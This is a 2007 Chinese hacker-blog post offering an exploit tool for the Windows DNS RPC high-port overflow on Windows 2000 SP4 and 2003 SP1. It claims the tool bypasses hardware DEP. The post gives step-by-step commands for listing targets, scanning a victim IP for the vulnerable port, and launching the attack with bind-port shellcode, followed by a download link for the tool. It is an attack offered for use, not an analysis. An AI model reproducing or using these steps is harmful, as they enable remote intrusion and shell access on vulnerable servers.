• 2007/04/26Microsoft RPC DNS Expliot

    版权声明:转载时请以超链接形式标明文章原始出处和作者信息及本声明
    http://www.blogbus.com/h4ck3r-logs/5158025.html

    windows dns 高端口溢出
    受影响系统包括2000和2003

    此exp针对:
     2000all  : Windows 2000 +SP4
     2003eng  : EN Windows 2003 Std Ed +SP1
     2003chs  : CN Windows 2003 Std Ed +SP1
     2003cht  : TW Windows 2003 Std Ed +SP1
     2003jpn  : JP Windows 2003 Std Ed +SP1
     2003kor  : KR Windows 2003 Std Ed +SP1

     硬件dep保护也能绕过

    1.anti_dep_v2.exe -l
    列出目标选项,目前支持的目标包括:
    2000all  : Windows 2000 +SP4
    2003eng  : EN Windows 2003 Std Ed +SP1
    2003chs  : CN Windows 2003 Std Ed +SP1
    2003cht  : TW Windows 2003 Std Ed +SP1
    2003jpn  : JP Windows 2003 Std Ed +SP1
    2003kor  : KR Windows 2003 Std Ed +SP1

    2.anti_dep_v2.exe -s 192.168.172.220
    扫描攻击目标的端口,在windows下扫描速度有些慢
    结果类似如下
    scanning

    192.168.172.220                           1027 :Vulnerability    OS:window 2003
    说明端口在1027,操作系统是window 2003,攻击的时候要使用到

    3.anti_dep_v2 -t2003chs 192.168.172.220 1027
    攻击2003 sp1中文版目标,使用bind端口的shellcode

     

    下载地址:http://h4ck3r.blogbus.com/files/11775594450.rar

    分享到:

    历史上的今天: